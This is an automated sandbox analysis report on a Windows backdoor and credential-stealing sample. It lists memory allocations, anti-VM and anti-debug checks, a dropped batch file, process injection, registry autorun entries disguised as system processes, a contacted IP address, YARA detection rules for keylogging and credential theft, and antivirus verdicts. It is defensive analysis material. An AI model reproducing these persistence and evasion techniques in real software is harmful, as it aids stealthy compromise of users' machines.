NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9316d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93281000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9328f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93291000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW July 31, 2021, 1:26 p.m.	total_number_of_free_bytes: 12311855104 free_bytes_available: 12311855104 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW July 31, 2021, 1:27 p.m.	total_number_of_free_bytes: 12301434880 free_bytes_available: 12301434880 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 31, 2021, 1:27 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 31, 2021, 1:27 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 31, 2021, 1:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 31, 2021, 1:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (30 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

chcp 65001

Communicates with host for which no DNS query was performed (1 event)

host

94.103.80.73

Installs itself for autorun at Windows startup (21 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\dinotify\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\dinotify\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\mf3216\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\mf3216\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe", "C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SearchIndexer	reg_value	"C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchIndexer	reg_value	"C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe", "C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe", "C:\ProgramData\Microsoft\pw.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\ProgramData\Microsoft\pw.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\ProgramData\Microsoft\pw.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe", "C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe", "C:\ProgramData\Microsoft\pw.exe", "C:\Windows\System32\ARP\spoolsv.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\ARP\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\ARP\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe", "C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe", "C:\ProgramData\Microsoft\pw.exe", "C:\Windows\System32\ARP\spoolsv.exe", "C:\Windows\System32\odbcconf\services.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\services	reg_value	"C:\Windows\System32\odbcconf\services.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services	reg_value	"C:\Windows\System32\odbcconf\services.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\dinotify\spoolsv.exe", "C:\Windows\System32\mf3216\spoolsv.exe", "C:\tmpogzukl\modules\auxiliary\__pycache__\SearchIndexer.exe", "C:\ProgramData\Microsoft\pw.exe", "C:\Windows\System32\ARP\spoolsv.exe", "C:\Windows\System32\odbcconf\services.exe", "C:\Windows\System32\KBDFI1\spoolsv.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\KBDFI1\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\KBDFI1\spoolsv.exe"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2620 resumed a thread in remote process 2948
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2948	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2952 thread_handle: 0x0000000000000068 process_identifier: 2948 current_directory: filepath: C:\Windows\System32\dinotify\spoolsv.exe track: 1 command_line: "C:\Windows\System32\dinotify\spoolsv.exe" filepath_r: C:\Windows\System32\dinotify\spoolsv.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Elastic	malicious (high confidence)
DrWeb	BackDoor.QuasarNET.5
MicroWorld-eScan	Trojan.MSIL.Basic.8.Gen
FireEye	Generic.mg.529156ed28b10d51
McAfee	GenericRXJH-DC!529156ED28B1
Sangfor	Trojan.Win32.Save.a
Alibaba	TrojanSpy:MSIL/SpyNoon.e7673037
Cybereason	malicious.d28b10
BitDefenderTheta	Gen:NN.ZemsilF.34050.nr0@aOr1ODpi
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.DFT
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Uztuby-9848412-0
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
BitDefender	Trojan.MSIL.Basic.8.Gen
Avast	Win32:TrojanX-gen [Trj]
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Sophos	ML/PE-A + Mal/SpyNoon-A
McAfee-GW-Edition	GenericRXJH-DC!529156ED28B1
Emsisoft	Trojan.MSIL.Basic.8.Gen (B)
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
MAX	malware (ai score=100)
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:MSIL/SpyNoon.RTU!MTB
GData	Trojan.MSIL.Basic.8.Gen
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.DC.C4552416
ALYac	Trojan.MSIL.Basic.8.Gen
Malwarebytes	Spyware.PasswordStealer
Tencent	Msil.Trojan-spy.Stealer.Suxl
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.CVT!tr
AVG	Win32:TrojanX-gen [Trj]
Panda	Trj/FakeST.A
CrowdStrike	win/malicious_confidence_90% (W)
Qihoo-360	Win32/TrojanSpy.Generic.HgIASZYA

intonetrefruntimedhcp.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All